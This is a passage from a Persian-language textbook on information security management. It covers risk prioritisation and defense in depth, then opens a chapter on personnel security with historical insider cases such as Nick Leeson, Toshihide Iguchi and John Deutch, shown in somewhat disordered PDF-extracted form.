‫ﻣﻘﺎﺑﻞ ﺁﻧﻬﺎ ﺍﻳﺪﺓ ﺧﺎﺻﻲ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ )ﻣﺜﻞ ﺗﻬـﺎﺟﻢ ﻳـﻚ ﺑﻴﮕﺎﻧـﻪ ﺍﺯ‬
‫ﻓﻀﺎ(؛ ﻳﺎ ﺑﻪ ﺁﻥ ﺳﺒﺐ ﻛﻪ ﺑﺴﻴﺎﺭ ﻏﻴﺮ ﻣﺤﺘﻤـﻞ ﻫـﺴﺘﻨﺪ‪ ،‬ﺩﻓـﺎﻉ ﺩﺭ‬
‫ﻣﻘﺎﺑﻠﺸﺎﻥ ﺑﺴﻴﺎﺭ ﺳﺨﺖ ﺑﺎﺷﺪ )ﻣﺜﻞ ﻭﻗـﻮﻉ ﻳـﻚ ﺍﻧﻔﺠـﺎﺭ ﻫـﺴﺘﻪﺍﻱ ﺩﺭ‬
‫‪ ۲۰۰‬ﻣﺘﺮﻱ ﻣﺮﻛﺰ ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ( ﻳﺎ ﺑﺴﻴﺎﺭ ﻓﺎﺟﻌﻪﺁﻣﻴﺰﺗﺮ ﺍﺯ ﺁﻥ ﺑﺎﺷـﻨﺪ‬
‫ﻛﻪ ﺑﺘﻮﺍﻥ ﺑﺎ ﺁﻧﻬﺎ ﻣﻘﺎﺑﻠﻪ ﻛﺮﺩ )ﻣﺜﻞ ﺍﻳﻨﻜﻪ ﻣﺪﻳﺮ ﺷﻤﺎ ﺗﺼﻤﻴﻢ ﺑﮕﻴﺮﺩ ﻛـﻪ‬
‫ﺗﻤﺎﻡ ﻣﺎﺷﻴﻨﻬﺎﻱ ﻳﻮﻧﻴﻜﺲ ﺭﺍ ﺗﺒﺪﻳﻞ ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻣﻌﺮﻭﻓﺘـﺮ ﻧﻤﺎﻳـﺪ!(‪.‬‬
‫ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺪﻳﺮﻳﺖ ﺧﻮﺏ‪ ،‬ﺩﺍﻧﺴﺘﻦ ﭼﻴﺰﻫﺎﻳﻲ ﺍﺳﺖ ﻛـﻪ ﺩﺭ ﻣـﻮﺭﺩ‬
‫ﺁﻧﻬﺎ ﻧﮕﺮﺍﻧﻲ ﺩﺍﺭﻳﺪ ﻭ ﻧﻴﺰ ﺍﻳﻨﻜﻪ ﻫﺮﻳـﻚ ﺍﺯ ﺍﻳـﻦ ﻣـﺴﺎﺋﻞ ﺗـﺎ ﭼـﻪ‬
‫ﺍﻧﺪﺍﺯﻩ ﻧﮕﺮﺍﻥﻛﻨﻨﺪﻩ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﺗﺼﻤﻴﻢﮔﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﺁﻧﭽﻪ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺍﺯ ﺁﻥ ﺣﻔﺎﻇﺖ ﻛﻨﻴﺪ‬
‫ﻭ ﻫﺰﻳﻨﻪﻫﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺑـﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﺗﻠﻔـﺎﺕ ﺁﻥ‬
‫ﺑﺪﻫﻴﺪ ﺭﺍ ﺩﺭ ﻣﻘﺎﺑﻞ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺗﺮﻣﻴﻢ ﺿﺮﺭﻫﺎﻱ ﻧﺎﺷـﻲ ﺍﺯ ﻳـﻚ‬
‫ﺭﺧﺪﺍﺩ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪ .‬ﺁﻧﮕﺎﻩ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻳﻦ ﺟﺪﻭﻝ ﻭ ﺑﺮ ﺍﺳﺎﺱ ﻳﻚ‬
‫ﻓﻬﺮﺳﺖ ﺍﻭﻟﻮﻳﺖﺑﻨﺪﻱﺷﺪﻩ ﺍﺯ ﺍﻛﺜـﺮ ﻗﺮﻳـﺐ ﺑـﻪ ﺍﺗﻔـﺎﻕ ﻧﻴﺎﺯﻫـﺎﻱ‬
‫ﺣﻴﺎﺗﻲ‪ ،‬ﺗﺼﻤﻴﻢ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻣﻮﺭﺩ ﻓﻌﺎﻟﻴﺘﻬـﺎ ﻭ ﻣﻌﻴﺎﺭﻫـﺎﻱ ﺍﻣﻨﻴﺘـﻲ‬
‫ﺑﮕﻴﺮﻳﺪ‪ .‬ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛـﻪ ﺩﺭ ﺍﻳـﻦ ﺗﺤﻠﻴـﻞ ﻋـﻼﻭﻩ ﺑـﺮ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎ‪ ،‬ﺗﺠﻬﻴﺰﺍﺕ ﻭ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺩﻳﮕﺮ ﺭﺍ ﻧﻴﺰ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪﺍﻳﺪ؛‬
‫ﻭ ﻓﺮﺍﻣﻮﺵ ﻧﻜﻨﻴـﺪ ﻛـﻪ ﻧﻮﺍﺭﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ‪ ،‬ﺍﺗـﺼﺎﻻﺕ ﺷـﺒﻜﻪ‪،‬‬
‫ﭘﺎﻳﺎﻧﻪﻫﺎ‪ ،‬ﻭ ﻣـﺪﺍﺭﻙ ﺷـﻤﺎ ﻫﻤـﻪ ﺍﺟﺰﺍﻳـﻲ ﺍﺯ ﺳﻴـﺴﺘﻢ ﻫـﺴﺘﻨﺪ ﻭ‬
‫ﻫﺮﻳﻚ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺧﺴﺎﺭﺗﻬﺎﻳﻲ ﺭﺍ ﺑـﻪ ﻛـﻞ ﺳﻴـﺴﺘﻢ ﻭﺍﺭﺩ ﺁﻭﺭﻧـﺪ‪.‬‬
‫ﺳﻼﻣﺖ ﻛﺎﺭﻛﻨﺎﻥ‪ ،‬ﺳﺎﺧﺘﻤﺎﻥ ﺷﺮﻛﺖ‪ ،‬ﻭ ﺍﻋﺘﺒﺎﺭ ﻭ ﻭﺟﻬﺔ ﻋﻤـﻮﻣﻲ‬
‫ﺁﻥ ﻧﻴــﺰ ﺑــﺴﻴﺎﺭ ﺣــﺎﺋﺰ ﺍﻫﻤﻴــﺖ ﻫــﺴﺘﻨﺪ ﻭ ﺑﺎﻳــﺪ ﺩﺭ ﻣﺤﺎﺳــﺒﺎﺕ‬
‫ﻃﺮﺣﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﻮﻧﺪ‪.‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﺍﻳﻨﻜﻪ ﺍﻧﺴﺎﻥ ﺿﻌﻴﻔﺘﺮﻳﻦ ﺣﻠﻘﺔ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺖ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﺎ ﻧﻴـﺴﺖ‬
‫ﻛﻪ ﺑﺎﻳﺪ ﺣﻔﺎﻇﺖ ﺍﺯ ﻧﻘﺎﻁ ﺿﻌﻒ ﺩﻳﮕـﺮ ﺭﺍ ﺑـﻪ ﻓﺮﺍﻣﻮﺷـﻲ ﺳـﭙﺮﺩ‪.‬‬
‫ﺍﻧﺴﺎﻥ ﻏﻴﺮﻗﺎﺑﻞ ﭘﻴﺶﺑﻴﻨﻲ ﺍﺳﺖ ﺍﻣﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳـﻚ ﻣـﻮﺩﻡ‬
‫ﻛﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﻧﺪﺍﺭﺩ ﺑﺴﻴﺎﺭ ﺳﺎﺩﻩﺗﺮ ﺍﺯ ﻣﺘﻘﺎﻋﺪ ﻛﺮﺩﻥ ﻳﻚ ﻛﺎﺭﻣﻨـﺪ‬
‫ﻛﻠﻴﺪﻱ ﺑﻪ ﺩﺭﻳﺎﻓﺖ ﺭﺷﻮﻩ ﺍﺳﺖ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻫﺮﺟـﺎ ﻛـﻪ ﺍﻣﻜـﺎﻥ ﺁﻥ‬
‫ﻲ ﻣﺒﺘﻨﻲ ﺑﺮ ﻓﻨﺎﻭﺭﻱ‬
‫ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺑﺎﻳﺪ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺗﺪﺍﻓﻌ ﹺ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﻢ ﻭ ﺍﻣﻨﻴﺖ ﻛﺎﺭﻛﻨﺎﻥ ﺧﻮﺩ ﺭﺍ ﺑـﺎ ﺁﻣـﻮﺯﺵ ﻛـﺎﺭﺑﺮﺍﻥ ﻭ‬
‫ﻛﺎﺭﻛﻨﺎﻥ ﺑﻬﺒﻮﺩ ﺑﺨﺸﻴﻢ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﺑﻪ ﺩﻓﺎﻉ ﺩﺭ ﻋﻤـﻖ ﺗﻜﻴـﻪ‬
‫ﻣﻲﻛﻨـﻴﻢ‪ :‬ﻣﺮﺍﺣـﻞ ﭼﻨﺪﮔﺎﻧـﺔ ﺩﻓـﺎﻋﻲ ﻣﺜـﻞ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﺑﻜـﺎﺭ‬
‫ﻣﻲﺑﺮﻳﻢ ﺗﺎ ﺩﺭﺻﻮﺭﺕ ﻧﺎﻣﻮﻓﻖ ﺑﻮﺩﻥ ﻳﻚ ﻻﻳـﻪ ﺩﺭ ﺗـﺄﻣﻴﻦ ﺩﻓـﺎﻉ‬
‫ﻻﺯﻡ‪ ،‬ﺩﭼﺎﺭ ﺯﻳﺎﻧﻬﺎﻱ ﺍﺳﺎﺳﻲ ﻧﺸﻮﻳﻢ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻳﻚ ﺳﻴـﺴﺘﻢ‬
‫ﺟﺎﻳﮕﺰﻳﻦ ‪ UPS‬ﻣﻲﺧﺮﻳﻢ؛ ﻳﺎ ﻫﺮﭼﻨﺪ ﺭﻭﻱ ﺩﺭ ﺳـﺎﺧﺘﻤﺎﻥ ﻳـﻚ‬
‫ﻗﻔﻞ ﻣﺴﺘﺤﻜﻢ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﻗﻔـﻞ ﺟﺪﺍﮔﺎﻧـﻪﺍﻱ ﺭﻭﻱ ﺩﺭ ﻭﺭﻭﺩﻱ‬
‫ﺍﺗﺎﻕ ﺭﺍﻳﺎﻧﻪ ﻗﺮﺍﺭ ﻣـﻲﺩﻫـﻴﻢ‪ .‬ﺣﻘﻴﻘـﺖ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﻣﻬـﺎﺟﻢ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮ ﺍﻳﻦ ﺗﺮﻛﻴﺒﻬﺎ ﻧﻴﺰ ﻏﻠﺒﻪ ﻛﻨﺪ‪ ،‬ﻭﻟـﻲ ﻣـﺎ ﻫﺰﻳﻨـﺔ ﺍﻧﺠـﺎﻡ‬
‫ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺑﺮﺍﻱ ﺍﻭ ﺑﺎﻻ ﻣﻲﺑﺮﻳﻢ؛ ﺁﻧﻘﺪﺭ ﺑﺎﻻ ﻛﻪ ﺷﺎﻳﺪ ﺑﺘﻮﺍﻧﻴﻢ ﺍﻭ ﺭﺍ‬
‫ﻗﺎﻧﻊ ﻛﻨﻴﻢ ﻛﻪ ﻋﺒﻮﺭ ﺍﺯ ﻣﻮﺍﻧﻊ ﺳﻴﺴﺘﻢ ﻣﺎ ﺑﻪ ﺩﺭﺩﺳﺮﻫﺎﻳﻲ ﻛﻪ ﺩﺍﺭﺩ‬
‫ﻧﻤﻲﺍﺭﺯﺩ‪ .‬ﺩﺭ ﺣﺎﻟﺖ ﺣﺪﺍﻗﻠﻲ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﻣﻴﺪﻭﺍﺭ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﺁﻧﻘـﺪﺭ‬
‫ﺳــﺮﻋﺖ ﻣﻬــﺎﺟﻢ ﺭﺍ ﻛــﺎﻫﺶ ﺩﺍﺩﻩ ﺑﺎﺷــﻴﺪ ﻛــﻪ ﭘــﻴﺶ ﺍﺯ ﺍﻳﻨﻜــﻪ‬
‫ﺩﺍﺭﺍﺋﻴﻬﺎﻱ ﻣﻬﻢ ﺍﺯ ﺩﭼﺎﺭ ﻣﺸﻜﻞ ﺷـﻮﻧﺪ‪ ،‬ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻧﻈـﺎﺭﺕ ﻭ‬
‫ﻫﺸﺪﺍﺭ‪ ،‬ﺷﻤﺎ ﺭﺍ ﺍﺯ ﺟﺮﻳﺎﻥ ﻧﻔﻮﺫ ﺁﮔﺎﻩ ﻛﻨﻨﺪ‪.‬‬
‫‪١٥٧‬‬
‫‪١٥٩‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫•‬
‫ﺟﺎﻥ ﺩﺍﭺ‪ ٩٧‬ﺭﺋـﻴﺲ ‪ CIA‬ﺩﺭ ﺯﻣـﺎﻥ ﺭﻳﺎﺳـﺖ ﺟﻤﻬـﻮﺭﻱ‬
‫ﺑﻴﻞ ﻛﻠﻴﻨﺘﻮﻥ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﺔ ﺩﻭﻟﺘـﻲ ﺭﺍ ﺍﺯ ﺳـﺎﺯﻣﺎﻥ‬
‫ﺑﻪ ﺧﺎﻧﻪﺍﺵ ﻣﻲﺑـﺮﺩ ﻭ ﺩﺭ ﺁﻧﺠـﺎ ﺩﺭ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻳﻲ ﺫﺧﻴـﺮﻩ‬
‫ﻣﻲﻛﺮﺩ ﻛﻪ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﻱ "ﻃﺒﻘﻪﺑﻨﺪﻱ ﻧﺸﺪﻩ" ﭘﻴﻜﺮﺑﻨـﺪﻱ‬
‫ﺷﺪﻩ ﺑﻮﺩﻧﺪ‪ .‬ﺩﺭﺣﺎﻟﻴﻜـﻪ ﺍﻃﻼﻋـﺎﺕ ﻃﺒﻘـﻪ ﺑﻨـﺪﻱﺷـﺪﻩ ﺩﺭ‬
‫ﺭﺍﻳﺎﻧــﻪﻫــﺎ ﻗــﺮﺍﺭ ﺩﺍﺷــﺘﻨﺪ‪ ،‬ﺍﺯ ﺁﻧﻬــﺎ ﺑــﺮﺍﻱ ﺩﺳــﺘﻴﺎﺑﻲ ﺑــﻪ‬
‫ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻣﺒﺘـﺬﻝ ﻭ ﻏﻴـﺮ ﺍﺧﻼﻗـﻲ ﻫـﻢ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣــﻲﺷــﺪ ‪ -‬ﭘﺎﻳﮕﺎﻫﻬــﺎﻳﻲ ﻛــﻪ ﻣﻤﻜــﻦ ﺑــﻮﺩ ﻫــﻢ ﺍﺯ‬
‫ﺁﺳــﻴﺐﭘــﺬﻳﺮﻳﻬﺎﻱ ﻋﻤــﻮﻣﻲ ﻭ ﻣﻨﺘــﺸﺮﺷﺪﻩ ﻭ ﻫــﻢ ﺍﺯ‬
‫ﺁﺳﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ ﺟﺪﻳـﺪ ﻭ ﺍﻓﺸﺎﻧـﺸﺪﻩ ﺑـﺮﺍﻱ ﺣﻤﻠـﻪ ﺑـﻪ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺮﺍﺟﻌﻪﻛﻨﻨﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪ .‬ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜـﻪ‬
‫ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ﻣﻘﺮﺭﺍﺕ ﻭ ﻗﻮﺍﻧﻴﻦ ﻣﺘﻌﺪﺩﻱ ﺗﻮﺳﻂ ﺩﺍﭺ ﺯﻳـﺮ‬
‫ﭘﺎ ﮔﺬﺍﺷﺘﻪ ﺷﺪﻩ ﺑﻮﺩ‪ ،‬ﻫﻴﭻ ﺍﻗـﺪﺍﻡ ﻋﻤﻠـﻲ ﻋﻠﻴـﻪ ﺍﻭ ﺍﻧﺠـﺎﻡ‬
‫ﻧﺸﺪ ﻭ ﺩﺭ ﺁﺧﺮﻳﻦ ﺭﻭﺯ ﺭﻳﺎﺳـﺖ ﺟﻤﻬـﻮﺭﻱ ﻛﻠﻴﻨﺘـﻮﻥ ﻧﻴـﺰ‬
‫ﻣﻮﺭﺩ ﻋﻔﻮ ﻭﻱ ﻗﺮﺍﺭ ﮔﺮﻓﺖ‪.‬‬
‫ﻓﺼﻞ ﺷﺸﻢ‬
‫ﺍﻣﻨﻴﺖ ﻛﺎﺭﻛﻨﺎﻥ‬
‫ﻛﻠﻴﺎﺕ‬
‫ﺍﻳﻦ ﻓﺼﻞ ﺑﻄﻮﺭ ﺧﻼﺻﻪ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻣـﺴﺎﺋﻞ ﺍﻣﻨﻴﺘـﻲ ﺭﺍ ﺑﺮﺭﺳـﻲ‬
‫ﻣﻲﻛﻨﺪ ﻛﻪ ﺍﺯ ﺩﺍﺧﻞ ﺳﺎﺯﻣﺎﻥ ﻧﺸﺄﺕ ﻣﻲ ﮔﻴﺮﻧﺪ‪ .‬ﻣـﺴﺎﺋﻞ ﺍﻣﻨﻴﺘـﻲ‬
‫ﻛﺎﺭﻛﻨﺎﻥ ﺍﺯ ﺍﺳﺘﺨﺪﺍﻡ ﻭ ﺍﺧﺮﺍﺝ ﮔﺮﻓﺘﻪ ﺗﺎ ﺁﻣﻮﺯﺵ ﻭ ﺁﮔـﺎﻫﻲ ﺁﻧـﺎﻥ‬
‫ﻧﻘﺸﻲ ﺣﻴﺎﺗﻲ ﺩﺭ ﻋﻤﻠﻜﺮﺩ ﭘﻴﺸﮕﻴﺮﺍﻧﻪ ﻭ ﺩﻓﺎﻋﻲ ﺳﺎﺯﻣﺎﻥ ﺩﺍﺭﻧﺪ‪.‬‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﻧﺸﺄﺕﮔﺮﻓﺘﻪ ﺍﺯ ﻛﺎﺭﻛﻨﺎﻥ؛‬
‫ﺗﻬﺪﻳﺪﻱ ﭘﻨﻬﺎﻥ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻥ‬
‫ﭼﻨﺪ ﻓﻘﺮﻩ ﺍﺯ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺧﺒﺮﺳﺎﺯﻱ ﻛـﻪ ﻃـﻲ ﭼﻨـﺪ ﺳـﺎﻝ ﺍﺧﻴـﺮ‬
‫ﺗﻮﺳﻂ ﻛﺎﺭﻛﻨﺎﻥ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﺗﻔﺎﻕ ﺍﻓﺘﺎﺩﻩ ﺭﺍ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ‪:‬‬
‫•‬
‫ﻧﻴــﻚ ﻟﻴــﺴﻮﻥ‪ ٨٩‬ﻳــﻚ ﺗــﺎﺟﺮ ﺳ ـﺮﻣﺎﻳﻪﮔــﺬﺍﺭ ﺩﺭ ﺑﺎﻧــﻚ‬
‫ﺑﺎﺭﻳﻨﮕﺰ‪ ٩٠‬ﺷﻌﺒﺔ ﺳﻨﮕﺎﭘﻮﺭ‪ ،‬ﻭ ﺗﻮﺷﻴﻬﺎﻳﺪ ﺍﻳﮕﻮﭼﻲ‪ ٩١‬ﺍﺯ ﺩﻓﺘﺮ‬
‫ﻧﻴﻮﻳﻮﺭﻙ ﺑﺎﻧﻚ ﺩﺍﻳﻮﺍ‪ ٩٢‬ﻫﺮ ﺩﻭ ﺍﻗﺪﺍﻡ ﺑﻪ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻳﻬﺎﻱ‬
‫ﭘﺮ ﻣﺨﺎﻃﺮﻩﺍﻱ ﻛﺮﺩﻧﺪ ﻛﻪ ﻣﻨﺠﺮ ﺑﻪ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﻣﻘﺎﺩﻳﺮ‬
‫ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﺍﺯ ﺳﺮﻣﺎﻳﺔ ﺑﺎﻧﻜﻬﺎﻳﺸﺎﻥ ﺷﺪ؛ ﺍﻣﺎ ﺁﻧﻬﺎ ﺑﺠـﺎﻱ‬
‫ﭘــﺬﻳﺮﺵ ﺷﻜــﺴﺖ‪ ،‬ﺳــﻮﺍﺑﻖ ﺣــﺴﺎﺑﻬﺎﻱ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺭﺍ‬
‫ﻝ ﺑـﺎﺯ ﻫـﻢ‬
‫ﻼ ﺑﺎ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﭘـﻮ ﹺ‬
‫ﺩﺳﺘﻜﺎﺭﻱ ﻛﺮﺩﻧﺪ ﻭ ﻋﻤ ﹰ‬
‫ﺑﻴﺸﺘﺮﻱ ﺭﺍ ﺑﺮﺍﻱ ﺟﺒﺮﺍﻥ ﺿﺮﺭﻫﺎﻱ ﻗﺒﻠﻲ ﻭﺍﺭﺩ ﺍﻳـﻦ ﻗﻤـﺎﺭ‬
‫ﻧﻤﻮﺩﻧﺪ؛ ﻭ ﺳﺮﺍﻧﺠﺎﻡ ﻧﻴﺰ ﺑﻌﺪ ﺍﺯ ﻭﺍﺭﺩ ﺁﻭﺭﺩﻥ ﺑﻴﺶ ﺍﺯ ﻳـﻚ‬
‫ﻣﻴﻠﻴﺎﺭﺩ ﺩﻻﺭ ﺯﻳﺎﻥ ﺑـﻪ ﻫﺮﻳـﻚ ﺍﺯ ﺍﻳـﻦ ﺩﻭ ﺑﺎﻧـﻚ ﻣـﻮﺭﺩ‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻨﺪ‪ .‬ﺩﺭ ﻧﺘﻴﺠـﺔ ﺍﻳـﻦ ﺍﻗـﺪﺍﻣﺎﺕ ﺑﺎﻧـﻚ‬
‫ﺑﺎﺭﻳﻨﮕﺰ ﻣﺠﺒﻮﺭ ﺑﻪ ﺍﻋﻼﻡ ﻭﺭﺷﻜﺴﺘﮕﻲ ﺷﺪ ﻭ ﺑﺎﻧﻚ ﺩﺍﻳـﻮﺍ‬
‫ﻧﻴﺰ ﻣﺠﻮﺯ ﺍﻧﺠﺎﻡ ﻓﻌﺎﻟﻴﺖ ﺍﻗﺘﺼﺎﺩﻱ ﺩﺭ ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﺭﺍ‬
‫ﺑﺮﺍﻱ ﻫﻤﻴﺸﻪ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩ‪.‬‬
‫‪Nick Leeson‬‬
‫‪Barings Bank‬‬
‫‪Toshihide Iguchi‬‬
‫‪Daiwa‬‬
‫‪89‬‬
‫‪90‬‬
‫‪91‬‬
‫‪92‬‬
‫ﺍﮔﺮ ﺷﻤﺎ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﻭ ﺳﺎﻳﺮ ﻗﺎﻧﻮﻥﺷﻜﻨﻴﻬﺎ ﻭ ﺗﺨﻠﻔﺎﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺭﺍ‬
‫ﻃﻲ ﭼﻨﺪ ﺩﻫﺔ ﺍﺧﻴﺮ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ‪ ،‬ﻳﻚ ﻭﻳﮋﮔﻲ ﻣﺸﺘﺮﻙ ﺩﺭ ﺁﻧﻬـﺎ‬
‫ﻣﻲﺑﻴﻨﻴﺪ‪ :‬ﻫﻤﺔ ﺁﻧﻬﺎ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﺑﻮﻗﻮﻉ ﭘﻴﻮﺳﺘﻪﺍﻧﺪ‪ .‬ﻋﻮﺍﻣﻞ ﻧﻔـﻮﺫ‪،‬‬
‫ﺍﻓﺮﺍﺩ ﺑﻮﺩﻩﺍﻧﺪ؛ ﻭﻳﺮﻭﺳـﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺭﺍ ﺍﻓـﺮﺍﺩ ﻧﻮﺷـﺘﻪ ﺑﻮﺩﻧـﺪ؛ ﻭ‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﺍ ﻧﻴﺰ ﺍﻓﺮﺍﺩ ﺩﺯﺩﻳﺪﻩ ﺑﻮﺩﻧﺪ‪.‬‬
‫ﺍﻣﻨﻴﺖ ﻛﺎﺭﻛﻨﺎﻥ" ﻋﺒﺎﺭﺕ ﺍﺳـﺖ ﺍﺯ ﻫﻤـﺔ ﻣﻮﺍﺭﺩﻳﻜـﻪ ﻣﺮﺑـﻮﻁ ﺑـﻪ‬
‫ﻛﺎﺭﻛﻨﺎﻥ ﻣﻲ ﺷﻮﺩ‪ :‬ﺍﺳﺘﺨﺪﺍﻡ‪ ،‬ﺁﻣﻮﺯﺵ‪ ،‬ﻛﻨﺘﺮﻝ ﺭﻓﺘﺎﺭ‪ ،‬ﻭ ﮔﺎﻫﻲ ﻧﻴﺰ‬
‫ﺍﺧﺮﺍﺝ‪ .‬ﺁﻣﺎﺭ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﻣﻬﻤﺘﺮﻳﻦ ﺩﺳﺘﺔ ﻣﺮﺗﻜﺒﻴﻦ ﺟـﺮﺍﺋ ﹺﻢ‬
‫ﺳﻨﮕﻴﻦ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﺴﺎﻧﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻳﺎ ﺍﺯ ﺩﺳﺘﺮﺳﻲ ﻗـﺎﻧﻮﻧﻲ ﺑـﻪ‬
‫ﺩﺍﺩﻩﻫﺎ ﺑﺮﺧﻮﺭﺩﺍﺭﻧـﺪ ﻭ ﻳـﺎ ﺩﺭ ﮔﺬﺷـﺘﺔ ﻧﺰﺩﻳـﻚ ﺍﺯ ﺁﻥ ﺑﺮﺧـﻮﺭﺩﺍﺭ‬
‫‪Aldrich Ames‬‬
‫‪Janathon Pollard‬‬
‫‪Robert Hanson‬‬
‫‪Robert Walker‬‬
‫‪John Deutch‬‬
‫‪93‬‬
‫‪94‬‬
‫‪95‬‬
‫‪96‬‬
‫‪97‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫•‬
‫ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑﻌﻀﻲ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﻭ ﺍﻓـﺮﺍﺩ ﻋﻠﻴـﺮﻏﻢ ﺩﺭ‬
‫ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻦ ﺗﺄﻳﻴﺪﻳﻪﻫﺎﻱ ﻣﻌﺘﺒ ﹺﺮ ﺍﻣﻨﻴﺘـﻲ ﺍﺯ ‪FBI ،CIA‬‬
‫ﻭ ﺍﺭﺗﺶ‪ ،‬ﺍﻃﻼﻋـﺎﺕ ﻃﺒﻘـﻪﺑﻨـﺪﻱ ﺷـﺪﻩﺍﻱ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ‬
‫ﺭﻭﺳﻴﻪ ﻭ ﺍﺳﺮﺍﺋﻴﻞ ﻗﺮﺍﺭ ﻣﻲﺩﺍﺩﻧﺪ )ﻣﺜﻞ ﺁﻟﺪﺭﻳﭻ ﺍﻳﻤﺰ‪ ،٩٣‬ﺟﺎﻧﺎﺗﺎﻥ‬
‫ﭘﻮﻻﺭﺩ‪ ،٩٤‬ﺭﺍﺑﺮﺕ ﻫﺎﻧﺴﻮﻥ‪ ٩٥‬ﻭ ﺭﺍﺑﺮﺕ ﻭﺍﻛﺮ‪ .(٩٦‬ﺍﻳﻦ ﺍﻓﺮﺍﺩ ﻋﻠﻴﺮﻏﻢ‬
‫ﻭﺟﻮﺩ ﻛﻨﺘﺮﻟﻬﺎﻱ ﻣﺘﻌﺪﺩ ﺍﻣﻨﻴﺘﻲ ﻗﺎﺩﺭ ﺑﻪ ﺍﻧﺠﺎﻡ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ‬
‫ﻣﺨـﺮﺏ ﺟﺎﺳﻮﺳــﻲ ‪ -‬ﺑﻌـﻀﹰﺎ ﺗــﺎ ﺑـﻴﺶ ﺍﺯ ﻳــﻚ ﺩﻫــﻪ ‪-‬‬
‫ﺑﻮﺩﻩﺍﻧﺪ‪.‬‬
‫‪١٦٠‬‬
